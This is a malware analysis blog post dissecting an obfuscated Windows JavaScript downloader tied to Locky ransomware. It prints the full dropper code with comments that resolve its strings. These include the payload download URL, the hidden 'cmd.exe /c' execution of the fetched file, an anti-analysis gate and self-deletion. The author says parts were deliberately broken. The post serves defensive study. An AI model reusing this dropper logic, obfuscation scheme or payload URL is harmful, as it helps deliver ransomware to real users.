Malware Analysis — Quick analysis of obfuscated Wanda.js (JS/Locky.M3!Eldorado)

DardiM

May 14, 2016
Wanda.js
6/55

It is a downloader: it fetches and runs a payload that appears to refuse to run inside VM / sandbox environments (see the conclusion):
boxun4.exe

Script : JavaScript

1) Quick Look at the code :

I removed / changed some parts on purpose, so that copy-paste => save as .js => run does NOT result in an infection :D (the listing below is therefore not a working sample)

var bygpufo = ["AD", "67778", "lkikatk", "udoj", "12323", "39378", "adnuxfe", "58453", "72505"];
var unafme = ["omyf", "61453", "qetsu", 703];
var ycharara6 = ["igygo", "fxanap", "tvalu", "yffevmorp", "yrikyfa", 'ru', "67080", "yjamu"];
var nzisyjs8 = ["xpyxsu", "amruq", "46708", "ct"];
var sbogewob0 = ["13898", "/re", "xexrejy"];
var udfoxsovz = ["62573", "82790", "86374", "90081", "yqebcyh", "le", "84249", "28400", "91602"];

function ogxetjowy() {
var dazfeb = [];
dazfeb["uboxyre"] = 'reqetdo';
dazfeb["nukjojg"] = "awetlowf";
dazfeb["dywxissy"] = "esi";
return dazfeb["dywxissy"];
}
var spudni0 = ["74499", "ylutfafb", "14321", "66448", 185, "ehtequjse", "68786", "83022", "95621"];

function izyq0() {
var ewydsuh6 = [];
ewydsuh6["pyzezgahz"] = "stem";
ewydsuh6["egdive"] = 'yzywbo';
ewydsuh6["alebo"] = "ycamm";
ewydsuh6["odmijibx"] = 'ajevisz';
ewydsuh6["jakonbajn"] = 'ilit';
return ewydsuh6["pyzezgahz"];
}
var cgyhi = ["jmuretx", "Tem"];

function zbyxizi5() {
var jahifa = [];
jahifa["icacy"] = 'izval';
jahifa["cbegeqsa"] = "wor";
jahifa["adfajawa"] = "some";
jahifa["ivgijgo"] = "uhvyhy";
return jahifa["cbegeqsa"];
}
function ufmotuz0() {
var ijfixepli4 = ["Bo", "70997", "ixhygtu", "kcehy", "ejkyhfawc", "82072", "vtedkyr", "ednymga", "btoje", "19482"]
return ijfixepli4[0];
}
var ovuz = ["T", "kxijpusyl"];
var tsapapte4 = ["85561", "86025", "52842", "49322", "41374", "87951", "Fu", "29050", "vuxe"];

function ewzeq5() {
var leqsintifw = ["soxulcom", "oqeltu", "kidisi", "49802", "49486", "rdejycji", "on", "jjylluxucg", "76375"]
return leqsintifw[6];
}
var fkuwyqu = ["l", "tycefi"];

function vijtikuwm() {
var nqyculagl = ["34204", "altohuv", "infyfragb", "61714", "12444", "43113", "96273", "Po", "ajewxeru", "63659"]
return nqyculagl[7];
}
var eqdakn7 = ["ipyxkofqu", 'Op'];
var osubcy0 = ["tveqgulhap", "OD", "etbodmusn", "50240", "31808", "68950"];

function tokoful8() {
var lryte = [];
lryte["toziftez"] = "sypuhra";
lryte["odixbulma"] = "js/";
lryte["fupi"] = "axhijgepk";
lryte["egsiz"] = "tufru";
return lryte["odixbulma"];
}
function ifbow() {
var pivuqkun1 = ["ptin", "bcocezev", "ubikexj", "29887"]
return pivuqkun1[0];
}
var miqypce2 = ["70952", "86477", "aracn", "upafata", "esijmapu", "37602", "XO", "obufdylo", "10040", "uqodo"];

function utes1() {
var oqabfafa = ["eflogwabgu", "87506", "xbogrynon", "ip"]
return oqabfafa[3];
}
function unolodx() {
var luzurnad = [];
luzurnad["etyfholn"] = "t.";
luzurnad["itdyvm"] = 'ombiru';
luzurnad["zsymka"] = "hmogiqwe";
luzurnad["oxlubjy"] = "oqojfevl";
luzurnad["ukyqpi"] = "abkirxa";
return luzurnad["etyfholn"];
}
var ohhif = ['Typ', "hovxibt", "onsajqabd", "ebiqbimxo", "64801", "40052", "23202", "otuvvuxza", "nzawun"];

function usyl() {
var prohkyky3 = ["vapjom", "24087", "59596", "72094", "ti"]
return prohkyky3[4];
}
var gagy = ["52411", "ptuqlo", "vmomisn", "omdavbesbe", "70533", 100, "64644", "apodhegp", "uspyfolu"];

function ulhuj() {
var lbagnycu2 = [];
lbagnycu2["gbaxpe"] = 'Wri';
lbagnycu2["npazaxe"] = 'xrykaku';
lbagnycu2["hnulhikt"] = 'avbuzliv';
lbagnycu2["ipevvigr"] = "adnak";
lbagnycu2["fibyfhaps"] = 'aputvo';
return lbagnycu2["gbaxpe"];
}
var utamnom0 = ["giro", 'me', "76931"];
var lxyvgu = ["qurexyr", "81309", "69525", "ojodwoqg", "erybu", "r", "25482"];

function lgywny() {
var oraljy4 = [];
oraljy4["bkazyfseh"] = 'lpasu';
oraljy4["nrynu"] = 'nwubid';
oraljy4["iqnahoz"] = 'pgepad';
oraljy4["ypadacta"] = 'ipkib';
oraljy4["ehifeft"] = 'Get';
return oraljy4["ehifeft"];
}
function zululmudb6() {
var abyzj9 = [];
abyzj9["kopaj"] = "aqaffy";
abyzj9["fycex"] = "ernonwe";
abyzj9["oxuvatgu"] = "bbubdoqfi";
abyzj9["bydwo"] = 'cnygpuq';
abyzj9["mjismurum"] = "e";
return abyzj9["mjismurum"];
}
function sbedi() {
var gqejja = ["38831", "30067", 'pNa', "41057", "48810", "egoq", "exqexe", "93968", "onxumwy", "evydecy"]
return gqejja[2];
}
var culalgo = ["92888", "71980", "Ar", "lfehkyl", "zxati", "42851"];
var myhzaxn = ["levpi", 'Sc', "25748"];

function qkanutfujt() {
var jmupgalajs = ["hlugald", 'n', "98246", "89757", "yviq", "uhaxl", "72898", "54749", "sxirnatz", "23444"]
return jmupgalajs[1];
}
var vzyqifp1 = ["Get", "ynyhkux", "qoqohy"];
var etnivwoqze = ["mgilni", "77938", "ybmehfitke", "rmewge", "65972", "25482", "Sa", "31329"];

function rofxu() {
var urumpi = ['de', "93154"]
return urumpi[0];
}
function gatkyx5() {
var uxqace9 = ["le", "keqlivess", "28140", "ugzyw", "horwoh", "awucqyj", "ofdaki", "okwiz", "xytcem"]
return uxqace9[0];
}
var ysryqi = ["90147", "73137", "hoka", "48832", "leSy", "gyfocpibf"];
var idnyfij8 = ["jobwyfsa", "39382", 185, "jjimza"];

function elgybqe0() {
var ogkefbek = [".ad", "75715"]
return ogkefbek[0];
}
function lerzabhab() {
var odolxe8 = [];
odolxe8["vhexguhco"] = "ohdys";
odolxe8["pcoslyrdejb"] = "me";
odolxe8["vuji"] = "iftumjy";
odolxe8["dgemy"] = 'fozwal';
odolxe8["ucpamecsu"] = 'tuhvu';
return odolxe8["pcoslyrdejb"];
}
function urepwi() {
var lowonock = [];
lowonock["belzypu"] = 'ghysvek';
lowonock["enfaf"] = "ptujpa";
lowonock["icakk"] = "el";
return lowonock["icakk"];
}
function irifwid2() {
var qofvew = ["onyw", "XM", "hyjip", "eprizod", "qolypfum"]
return qofvew[1];
}
var oveghuqj = ["sgutawixn", "ukgabb", "42669", "re", "qvopvuzpy", "pumaq", "visgish", "59965"];
var qonijac = ["Ac", "70466", "eqoj", "edytmaxe", "jsajened"];
var gakahy = ["89526", "erobsybx", "qwuhwyvs", "35179", "xmidiza", 'Cl', "91132", "diboxe", "abaxols"];
var nolyf = ["29630", "twusryl", "rgevotw", "te."];
var tixqa3 = ["19254", "mibu", "esnijp", "HT"];
var xbanhe = ["32010", "nd", "okuzd", "91664", "30935"];

function qrawolow() {
var gfyva3 = [];
gfyva3["uzlimlop"] = "wmyjefgi";
gfyva3["bguzseko"] = "dy";
gfyva3["kwisydeq"] = 'abnita';
return gfyva3["bguzseko"];
}
function apmof() {
var shossiku6 = ["dhavneryqp", 'se', "extunimno", "50728", "64191", "onykwe", "evdomfar", "atubhufny", "86999", "axdepkocc"]
return shossiku6[1];
}
function kyfduhp9() {
var ucbas8 = ["73339", "TP", "78239"]
return ucbas8[1];
}
function nbepxebo7() {
var ysqobd7 = [];
ysqobd7["vrexhiln"] = "am";
ysqobd7["admofafdu"] = "asanreq";
ysqobd7["yhyxbyca"] = 'rodov';
return ysqobd7["vrexhiln"];
}
var wxavi4 = ["53960", "To", "ytxenbi", "ahufqa", "51322", "86510"];
var zegrolla = ["szydospy", "87961", 'us', "ocwuvcazjo", "ebup", "obehxyto", "mocefi", "uwsyw", "pukjobpi"];
var fupjyjn2 = ["ehloqari", 'St', "62367"];
var shyjabesp = ["17810", "xehuhaw", "le", "77218", "99857", "ijywu", "19892", "dtubmu", "64878"];

function gito4() {
var hihytxa2 = ["32942", "34427", "werympo", "dywtysidq", "Obje", "46865"]
return hihytxa2[4];
}
function gewyhvy5() {
var kopy3 = ["54411", "13830", "ex", "88989", "ezdixi", "vybojli"]
return kopy3[2];
}
var ogojbi9 = ["49473", "lwecqi", "42705", 'Spe', "avlabik"];
var tpexpon = ["kvezkify", "58415", "MS", "71896", "13958", "88679", "19137"];

function momvyze() {
var vluzsen = ["93167", "jfobmyrant", "Sh", "97215", "30396"]
return vluzsen[2];
}
function bjybpymmak() {
var ysimnafu = [];
ysimnafu["gwutvew"] = 'noziqwa';
ysimnafu["ijxus"] = 'ozjag';
ysimnafu["pyxivquzg"] = "on";
ysimnafu["epyti"] = "fbaxo";
ysimnafu["uxuni"] = "rtyjte";
return ysimnafu["pyxivquzg"];
}
function ojolahy4() {
var odyblo = [];
odyblo["cnaxke"] = "rabi";
odyblo["qxekwuj"] = "enkosunz";
odyblo["iqwynydg"] = "Re";
odyblo["tsoqad"] = "ysyjba";
odyblo["encihwiqf"] = "kfyjve";
return odyblo["iqwynydg"];
}
var vcyqkarj9 = ["box", "30470", "38474", "ogjut", "88574", "dlelfe", "ukuhzoxwe", "foveg", "fkufyznydw", "ocoryxi"];

function adefhi9() {
var zhyxfegwe = ["77254", "bj"]
return zhyxfegwe[1];
}
function socjyhlom0() {
var zqexu2 = [];
zqexu2["usginj"] = 'hvemijko';
zqexu2["qylac"] = "exuqox";
zqexu2["ydgetqe"] = "GE";
return zqexu2["ydgetqe"];
}
var esijy9 = ["45850", 100, "62916", "32146", "izinlyfi"];

function uzsebdypfy() {
var ecrurgaq = ["14831", 'cia', "28503", "ubkekiqs"]
return ecrurgaq[1];
}
function owutqosf5() {
var kesu = ['Na', "84350", "lihebybp"]
return kesu[0];
}
var ixjapa = ["60003", "ti", "27933", "27014", "wubxycz", "orugta", "83909"];

function elbixaqt() {
var owid7 = [];
owid7["tutdidub"] = 'udrucsav';
owid7["logebi"] = "ru/";
owid7["orobedz"] = "hyduxx";
owid7["imlarre"] = 'epappe';
owid7["ybqyvhezu"] = "uvydhajq";
return owid7["logebi"];
}
function apoljojk() {
var tzywe = ["ifon", "86894", "67475", "67879", "axvosvutr", "taliqh", "obrypsi", "51213", "nt", "33043"]
return tzywe[8];
}
function ubwydbupc() {
var fwycobzot = [];
fwycobzot["yjsulonwu"] = "fmica";
fwycobzot["vvoqxo"] = 'eruqh';
fwycobzot["hurbujt"] = "jlekxehk";
fwycobzot["ysexn"] = "sibdisti";
fwycobzot["zikumo"] = "Na";
return fwycobzot["zikumo"];
}
function ifag3() {
var bcevu3 = [];
bcevu3["unwebi"] = "opvabobr";
bcevu3["yttife"] = "jytu";
bcevu3["ypafa"] = 'pija';
bcevu3["akvatdilu"] = "g.Fi";
bcevu3["yldujoxxy"] = 'ukys';
return bcevu3["akvatdilu"];
}
function ewunta() {
var hfibotyf = [];
hfibotyf["aphecy"] = "dtobubta";
hfibotyf["sejoji"] = 'ksiniha';
hfibotyf["konaw"] = 'n';
hfibotyf["yweheto"] = "ytitxyzj";
return hfibotyf["konaw"];
}
var focvaq0 = ["72021", "ytlanpa", "81176", "avqutde", "qixkotnoc", "ve", "baqzeqy", "90063", "bgiqzon"];

function wsycli9() {
var onoztaxny0 = ["90538", "cony", "11158", "dacyty", "lxupyzymm", "kamfocvind", "t"]
return onoztaxny0[6];
}
var ucynucji0 = ["59001", "ec", "32190", "72212", "46163", "24252", "71307"];
var buvtyhe = ["74214", 778, "91132", "usilfe", "52588", "srupvukcal"];

function qbijyc() {
var svyppugwi6 = ["enrypfytsi", "61437", "51397", "htt", "80566", "86125"]
return svyppugwi6[3];
}
function ahfalo() {
var gkubuh = ["ewoza", "usfath", "yremxu", "apira", "87678", "lFo", "bdubexjej", "odorzyzi"]
return gkubuh[5];
}
var myjcigkab6 = ["ybep", "mpevgofxarm", "ohonp", "84011", "87257", WScript][5];

function xoxsebmyf() {
var nigkykh8 = [];
nigkykh8["lpivihemg"] = "oqozmes";
nigkykh8["ohawqy"] = 'xekmobze';
nigkykh8["ansycij"] = 'lde';
nigkykh8["edyguwf"] = 'ujazgotj';
return nigkykh8["ansycij"];
}
var ytuzzy4 = ["77477", "ajvixn", "fycfotp", "okemuc", "91397", "pabjoksin", "88360", 636, "13372"];
var jtytohhoqz9 = ["80093", "Scri", "21304"];
var hxoqny3 = ["fitajtanj", "54902", "30480", "75220", 'le', "99168", "80807", "ibgoly", "pume"];

function anpig() {
var ubpifm = ["28322", "83101", "gsughe", "qlebsog", "18788", "gam", "uvyldob", "iczihdo", "72024", "blatzu"]
return ubpifm[5];
}
var elgits9 = ["at", "wdasalqa"];
var psyqmomabc = ["itizi", "htetyhka", "nsicopl", "93052", "79924", 799, "hijgimtag", "jgodfi", "20828", "wfari"];
var yduv = ["90462", "cjahymutp", "32391", "ollygy", "22274", "24279", "egoq", "92190", "d."];
var fojjynb9 = ["13878", "19650", "90583", "14019", "84466", "52120", ".X", "89652"];
var cuqqywn0 = ["72744", "gu", "58492", "66141"];

function ucytw9() {
var pnicacfo0 = ["uxbybtu", "ixxizko", "58609", "14020", "e", "90766", "uhuh", "ilwev", "65482"]
return pnicacfo0[4];
}
function ibekh() {
var icqosocu4 = ["80273", "kira", "fxapuhikd", "htotycg", "20758", "lorde", "48415", "tbuhpejgem", "ML", "57863"]
return icqosocu4[8];
}
var ubyxs = ["arlemu", "53179", "ytjybcyqv", "selyqz", "46591", "72151", "67654", "th"];

function mufo0() {
var edypjyng = ['me', "idzuszuba", "iganb", "uhoj", "18882"]
return edypjyng[0];
}
var ukebt = ["53001", "24692", "72715", "L2"];

function coxxi4() {
var txidec = [];
txidec["koplabnowz"] = "udsivo";
txidec["syseptamc"] = "abit";
txidec["ujgage"] = 'ihbedygb';
txidec["omkawwo"] = 'll';
txidec["ojwoh"] = 'nule';
return txidec["omkawwo"];
}
function fihzard() {
var rendoqf0 = [];
rendoqf0["urwadaxu"] = "kurlezc";
rendoqf0["onog"] = 'en';
rendoqf0["gego"] = "vyqo";
rendoqf0["bzedy"] = 'pymxy';
rendoqf0["izix"] = "vsiskynte";
return rendoqf0["onog"];
}
var unaca = [703, "gcuwi", "ryno", "lnopu", "63526", "olkatu", "64491", "26490", "76071", "uberr"];
var zokahw = ["jugqe", 'ope', "osvatiki", "53293"];

function lires() {
var pumu = [];
pumu["cynmuct"] = "/c";
pumu["bytaqn"] = 'ydben';
pumu["gcebgut"] = "oguw";
pumu["emgytv"] = "olsoz";
return pumu["cynmuct"];
}
var ihdynkiri = ["s", "37570", "78532", "96473", "95345"];

function pyjxu() {
var izwitf = [];
izwitf["lwahhywte"] = "myzo";
izwitf["yhciqabxy"] = "evdohet";
izwitf["tqyhdogh"] = 'efgybuqw';
izwitf["onkubohro"] = "scahiri";
izwitf["awawqa"] = "cr";
return izwitf["awawqa"];
}
function gipertug9() {
var qolis2 = ["scuhibd", "npadi", "sepugp", "38920", "59978", "wmydkipogc", "d"]
return qolis2[6];
}
function mywoxd() {
var kxatmomk = ["44899", "yzluxtob", "objaxqalv", "xoxymydz", "hepina", "25635", "85528", "ng", "30722"]
return kxatmomk[7];
}
function ybufbedu4() {
var uqpupj = ["74845", "gyva", "18430", "48603", "ygrokgiwh", "98146", "98703", "e ", "ercydgiwxy", "xyjqi"]
return uqpupj[7];
}
var enibji = ["zragux", "quxaxs", "vetrur", "e", "47408", "efmacyzb"];

function incejpoki() {
var sirsen6 = ["si", "16068", "75326", "nafkadpaj"]
return sirsen6[0];
}
var enyrzo = ["62464", "obyri", "64768", "un4", "pevu", "tahowwajd", "81947"];
var wisore5 = ["81705", "28902", 'te', "afjygza", "62864", "afsewsi"];

function qzyjygde2() {
var darwisyd6 = [];
darwisyd6["imtuzyhsi"] = 'ozej';
darwisyd6["awejhifwo"] = "obvobukt";
darwisyd6["yjzohopz"] = 'te';
darwisyd6["wsepef"] = 'yrrytu';
darwisyd6["hatu"] = 'izdarewv';
return darwisyd6["yjzohopz"];
}
var ojeqono = ["dibeci", "84357", "47825", "39853", "dasfewep", "xubujq", "76347", "se"];

function ekzodi9() {
var dolguwvah = ["atbefujpi", "cgecbujo", "oldijo", 'Fi']
return dolguwvah[3];
}
function amernus() {
var xebbyfv7 = ["ksinbaj", "mpupu", 'Fi']
return xebbyfv7[2];
}
function irdulxy6() {
var fqozal8 = ["avyxsire", "cvijkot", "86382", "muhso", "53164", "62783", " ", "36477", "qugdalwe", "58516"]
return fqozal8[6];
}
function okymeln() {
var udcubfapbo = [];
udcubfapbo["fjotwekon"] = "pt";
udcubfapbo["jkinid"] = "lykorf";
udcubfapbo["olcujjo"] = "bejihti";
udcubfapbo["vlawa"] = 'rkirald';
udcubfapbo["bovybri"] = 'ozqodgyhr';
return udcubfapbo["fjotwekon"];
}
function ivugniva9() {
var mefanp = [];
mefanp["gdavy"] = 'iflisg';
mefanp["apadj"] = "irusu";
mefanp["opubgeg"] = "verkyl";
mefanp["yvrasuhl"] = 'onyfg';
mefanp["vogwav"] = "St";
return mefanp["vogwav"];
}
function fzerutu() {
var ifefne6 = [];
ifefne6["rnergywr"] = "me";
ifefne6["sydfazefv"] = 'yjnetx';
ifefne6["wona"] = 'yraqh';
return ifefne6["rnergywr"];
}
var ahuxaju3 = ["jolze", "efahj", "ult", "98019", "utacora", "jakmuqz", "uwsybrute", "50777", "16109"];

function igubijbi8() {
var peskuxroqk = ["30389", "WS"]
return peskuxroqk[1];
}
function yfvirz6() {
var qwykygid6 = [];
qwykygid6["obumg"] = 'ujkehfy';
qwykygid6["yszagr"] = "cm";
qwykygid6["coxca"] = "zwivov";
return qwykygid6["yszagr"];
}
var tfirsek = ["p:/", "gryhcaw", "31267", "ohuzki"];

function jtujekofq3() {
var kmexrajy0 = [];
kmexrajy0["intyjsabz"] = "cgafsacy";
kmexrajy0["epquku"] = "bsokhuny";
kmexrajy0["bqiwysme"] = "B.";
kmexrajy0["hnipdenpe"] = "asutjig";
return kmexrajy0["bqiwysme"];
}
var jarxid = ["zufatly", 've', "69796", "44204", "afodzuwa", "64212", "wsungowwa", "ujjijegj", "ixesyxle", "imdomce"];

function wleno5() {
var lisot7 = [];
lisot7["atvamx"] = 'qedmi';
lisot7["rkacokom"] = "os";
lisot7["essokviqp"] = "zuqda";
lisot7["qecy"] = 'ocela';
lisot7["coci"] = "ctuxla";
return lisot7["rkacokom"];
}
var uxardykv5 = ['\\\\', "jhibembyt"];

function isqadozve5() {
var ozgyfja = [];
ozgyfja["fqottyryw"] = "izbize";
ozgyfja["ibewki"] = "efoctu";
ozgyfja["ygig"] = 'ddujisy';
ozgyfja["upukopso"] = "der";
ozgyfja["zersykca"] = 'yrtuwib';
return ozgyfja["upukopso"];
}
function ucypygg() {
var ajvuzqom = ["sp", "lfujezo", "50274", "54052", "tiky"]
return ajvuzqom[0];
}
function ikirsime0() {
var ytorozta8 = ["riku", "86590", "tqegkebgo", "99204", "98256", "ixyj", ".ex", "owneswudo", "38360"]
return ytorozta8[6];
}
function onagij() {
var mufy6 = [];
mufy6["gkyxe"] = 'ufagk';
mufy6["ubwymk"] = 'ri';
mufy6["jusraxc"] = "wuddoke";
mufy6["yqinsy"] = 'ojhyz';
return mufy6["ubwymk"];
}
function tubvy() {
var ilizibo = ["99315", "46571", "72254", "93300", "jninuvc", myhzaxn[1] + onagij() + okymeln() + tsapapte4[6] + coxxi4() + owutqosf5() + mufo0()]
return ilizibo[5];
}
function yxubuhu() {
var zhirbiw4 = ["ussitgaby", "73969", "38268", "ultukkihy", "mliplu", eqdakn7[1] + fihzard(), "yludiw", "39046"]
return zhirbiw4[5];
}
function lymuvh() {
var hysdavy = [];
hysdavy["keku"] = vijtikuwm() + incejpoki() + ixjapa[1] + bjybpymmak();
hysdavy["abzan"] = 'usnuxqok';
hysdavy["aqjajo"] = 'ofoxu';
hysdavy["kebykvy"] = 'khypkexry';
hysdavy["mittete"] = "yxxefa";
return hysdavy["keku"];
}
function ackogyngu() {
var wberaquz = ["47357", "jabo", "87884", zokahw[1] + ewunta()]
return wberaquz[3];
}
function hwontyna() {
var hlapde = [];
hlapde["ripu"] = lgywny() + ogojbi9[3] + uzsebdypfy() + ahfalo() + xoxsebmyf() + lxyvgu[5];
hlapde["ibjylw"] = 'osniqo';
hlapde["zgope"] = "loti";
hlapde["otoh"] = 'ygbizolf';
return hlapde["ripu"];
}
function yretby5() {
var ufxibdaq = [];
ufxibdaq["stylguh"] = "ftoziznu";
ufxibdaq["appihhiru"] = vzyqifp1[0] + cgyhi[1] + sbedi() + utamnom0[1];
ufxibdaq["npukgysog"] = 'amteh';
ufxibdaq["lehfytp"] = "umotse";
ufxibdaq["nbotxikqy"] = "lperceq";
return ufxibdaq["appihhiru"];
}
function hojy3() {
var dwedy2 = [];
dwedy2["icriwmez"] = ohhif[0] + ucytw9();
dwedy2["vkazehi"] = 'orsegda';
dwedy2["ccyqimwa"] = 'haskecy';
dwedy2["uciwl"] = 'ride';
return dwedy2["icriwmez"];
}
function ydugo0() {
var uqsahhexga = [];
uqsahhexga["qrelqyql"] = apmof() + xbanhe[1];
uqsahhexga["eqxygduc"] = "arildowb";
uqsahhexga["gsylohakt"] = 'uqycvel';
return uqsahhexga["qrelqyql"];
}
function lsexnukmojn5() {
var ymelhexg = [];
ymelhexg["oqibw"] = "vini";
ymelhexg["mluhsynpu"] = "yqomy";
ymelhexg["bhabymko"] = 'fitgi';
ymelhexg["rdahse"] = fupjyjn2[1] + elgits9[0] + zegrolla[2];
ymelhexg["vcovbehylh"] = 'igovgy';
return ymelhexg["rdahse"];
}
function jwesifr0() {
var nanex = ["pgadla", "abeslimxa", ulhuj() + qzyjygde2(), "89931"]
return nanex[2];
}
function hogkevitm0() {
var gohakxu = [];
gohakxu["vsebe"] = 'exdyth';
gohakxu["ecnorfo"] = "ruwsyddu";
gohakxu["bvojul"] = 'buwse';
gohakxu["dygyj"] = ojolahy4() + ucypygg() + ewzeq5() + ojeqono[7] + ufmotuz0() + qrawolow();
gohakxu["hissift"] = "ugonf";
return gohakxu["dygyj"];
}
function jutu0() {
var zucna = [etnivwoqze[6] + jarxid[1] + wxavi4[1] + ekzodi9() + shyjabesp[2], "jnahhopjef", "64635"]
return zucna[0];
}
function isiqku2() {
var xmoty = [];
xmoty["nelpoqjez"] = "typud";
xmoty["siqi"] = gakahy[5] + wleno5() + zululmudb6();
xmoty["znidtysi"] = "byvmy";
xmoty["lecuzo"] = "sorxobo";
return xmoty["siqi"];
}
function amjugaxqa8() {
var zciqli4 = [];
zciqli4["uwep"] = "gmigex";
zciqli4["iqube"] = "feboqda";
zciqli4["swytyt"] = ycharara6[5] + qkanutfujt();
zciqli4["dyjunw"] = "vkomvi";
return zciqli4["swytyt"];
}
function zaddeqpa0() {
var yqyww = [];
yqyww["gqoqusy"] = "duquqc";
yqyww["labnitdo"] = 'miba';
yqyww["volqy"] = rofxu() + udfoxsovz[5] + wisore5[2] + amernus() + hxoqny3[4];
yqyww["kolbatezz"] = 'imorj';
return yqyww["volqy"];
}
// Dropper body: the only part of the script that does anything. Every helper
// above just returns one string fragment; the fragments are concatenated here
// into COM ProgIDs, method names, the download URL and the command line, and
// numeric arguments are hidden as subtractions of two constants. Resolved
// values are given in the comments on each line.
try {
var eqnok2 = myjcigkab6; // WScript (myjcigkab6 = [..., WScript][5])
// "Ar"+"gu"+"me"+"nt"+"s", "Na"+"me"+"d", "le"+"ng"+"th" => WScript.Arguments.Named.length
// Anti-analysis gate: ActiveXObject is only resolved when the script was
// started WITHOUT named arguments (/name:value). With any named argument
// siga88 stays undefined, the first `new siga88(...)` throws and the empty
// catch below hides it, so the script appears to do nothing.
if (!eqnok2[culalgo[2] + cuqqywn0[1] + fzerutu() + apoljojk() + ihdynkiri[0]][ubwydbupc() + lerzabhab() + gipertug9()][gatkyx5() + mywoxd() + ubyxs[7]]) {
var siga88 = eval(qonijac[0] + usyl() + focvaq0[5] + miqypce2[6] + adefhi9() + ucynucji0[1] + wsycli9()); // eval("Ac"+"ti"+"ve"+"XO"+"bj"+"ec"+"t") => ActiveXObject; eval keeps the literal out of the file
}
var wjerco = jtytohhoqz9[1] + ifbow() + ifag3() + ysryqi[4] + izyq0() + gito4() + nzisyjs8[3]; // "Scripting.FileSystemObject"
var vihtew9 = bygpufo[0] + osubcy0[1] + jtujekofq3() + ivugniva9() + oveghuqj[3] + nbepxebo7(); // "ADODB.Stream"
var uglahup = tpexpon[2] + irifwid2() + ukebt[3] + fojjynb9[6] + ibekh() + tixqa3[3] + kyfduhp9(); // "MSXML2.XMLHTTP"
var azjod = new siga88(vihtew9); // ADODB.Stream - receives the response body
var urrigucx = new siga88(wjerco); // Scripting.FileSystemObject - temp path, self-delete
var opcakco = new siga88(uglahup); // MSXML2.XMLHTTP - the download request
var uffyvqo = qbijyc() + tfirsek[0] + sbogewob0[1] + zbyxizi5() + isqadozve5() + elgybqe0() + ahuxaju3[2] + anpig() + ogxetjowy() + nolyf[3] + elbixaqt() + tokoful8() + vcyqkarj9[0] + enyrzo[3] + ikirsime0() + enibji[3]; // "http://reworder.adultgamesite.ru/js/boxun4.exe" (payload URL)
var mysfefyg = eqnok2[tubvy()]; // WScript["Sc"+"ri"+"pt"+"Fu"+"ll"+"Na"+"me"] => path of this script
azjod[yxubuhu()](); // stream.Open()
var areglaly8 = igubijbi8() + pyjxu() + utes1() + unolodx() + momvyze() + urepwi() + fkuwyqu[0]; // "WScript.Shell"
azjod[lymuvh()] = spudni0[4] - idnyfij8[2]; // stream.Position = 185 - 185 = 0
opcakco[ackogyngu()](socjyhlom0() + ovuz[0], uffyvqo, unaca[0] - unafme[3]); // http.open("GE"+"T", url, 703 - 703 = 0) => synchronous GET
var yzysa = urrigucx[hwontyna()](buvtyhe[1] - 776) + uxardykv5[0] + urrigucx[yretby5()](); // fso.GetSpecialFolder(778 - 776 = 2) + "\\" + fso.GetTempName() => %TEMP%\<random>.tmp
azjod[hojy3()] = ytuzzy4[7] - 635; // stream.Type = 636 - 635 = 1 (binary)
opcakco[ydugo0()](); // http.send()
var imytalir = yfvirz6() + yduv[8] + gewyhvy5() + ybufbedu4() + lires() + irdulxy6() + yzysa; // "cmd.exe /c " + temp file path
if (opcakco[lsexnukmojn5()] == psyqmomabc[5] - 599) { // http.Status == 799 - 599 = 200
var zofa1 = new siga88(areglaly8); // WScript.Shell
azjod[jwesifr0()](opcakco[hogkevitm0()]); // stream.Write(http.ResponseBody)
azjod[jutu0()](yzysa); // stream.SaveToFile(temp file path)
azjod[isiqku2()](); // stream.Close()
// shell.run(cmd_line, 703 - 703 = 0) => hidden window. NOTE: amjug_axqa8 is not
// defined anywhere in this listing (the helper that returns "ru"+"n" is
// amjugaxqa8); this looks like one of the author's deliberate copy-paste breaks.
zofa1[amjug_axqa8()](imytalir, unaca[0] - unafme[3]);
}
urrigucx[zaddeqpa0()](mysfefyg); // fso.deleteFile(WScript.ScriptFullName) => the dropper removes itself
} catch (yhvuhnybu2) {} // every failure (no ActiveX, network/AV block, named arguments) is silently swallowed

Obfuscation: every important string (COM ProgIDs, method names, the URL, the command line) is built at runtime by concatenating fragments returned from function calls and array lookups, and numeric arguments are hidden as subtractions of two constants (e.g. 799 - 599 = 200).

- a plain text search finds none of the usual indicators that are easy to spot in many obfuscated scripts (open, write, ActiveXObject, etc.); even the name ActiveXObject is only assembled at runtime and resolved through eval(),
- there is no layered obfuscation (no quick first decoding layer followed by a second method, etc.): it is a single flat layer of string splitting.

2) Let's deobfuscate it :

First step: move the top-level `var` declarations to the top of the file and the functions to the end, so the data and the code that uses it can be read separately

var bygpufo = ["AD", "67778", "lkikatk", "udoj", "12323", "39378", "adnuxfe", "58453", "72505"];
var unafme = ["omyf", "61453", "qetsu", 703];
var ycharara6 = ["igygo", "fxanap", "tvalu", "yffevmorp", "yrikyfa", 'ru', "67080", "yjamu"];
var nzisyjs8 = ["xpyxsu", "amruq", "46708", "ct"];
var sbogewob0 = ["13898", "/re", "xexrejy"];
var udfoxsovz = ["62573", "82790", "86374", "90081", "yqebcyh", "le", "84249", "28400", "91602"];
var spudni0 = ["74499", "ylutfafb", "14321", "66448", 185, "ehtequjse", "68786", "83022", "95621"];
var cgyhi = ["jmuretx", "Tem"];
var ovuz = ["T", "kxijpusyl"];
var tsapapte4 = ["85561", "86025", "52842", "49322", "41374", "87951", "Fu", "29050", "vuxe"];
var fkuwyqu = ["l", "tycefi"];

var wxavi4 = ["53960", "To", "ytxenbi", "ahufqa", "51322", "86510"];
var zegrolla = ["szydospy", "87961", 'us', "ocwuvcazjo", "ebup", "obehxyto", "mocefi", "uwsyw", "pukjobpi"];
var fupjyjn2 = ["ehloqari", 'St', "62367"];
var shyjabesp = ["17810", "xehuhaw", "le", "77218", "99857", "ijywu", "19892", "dtubmu", "64878"];

var myjcigkab6 = ["ybep", "mpevgofxarm", "ohonp", "84011", "87257", WScript][5];
ytuzzy4 = ["77477", "ajvixn", "fycfotp", "okemuc", "91397", "pabjoksin", "88360", 636, "13372"];
var jtytohhoqz9 = ["80093", "Scri", "21304"];
var hxoqny3 = ["fitajtanj", "54902", "30480", "75220", 'le', "99168", "80807", "ibgoly", "pume"];
var elgits9 = ["at", "wdasalqa"];
var psyqmomabc = ["itizi", "htetyhka", "nsicopl", "93052", "79924", 799, "hijgimtag", "jgodfi", "20828", "wfari"];
var yduv = ["90462", "cjahymutp", "32391", "ollygy", "22274", "24279", "egoq", "92190", "d."];
var fojjynb9 = ["13878", "19650", "90583", "14019", "84466", "52120", ".X", "89652"];
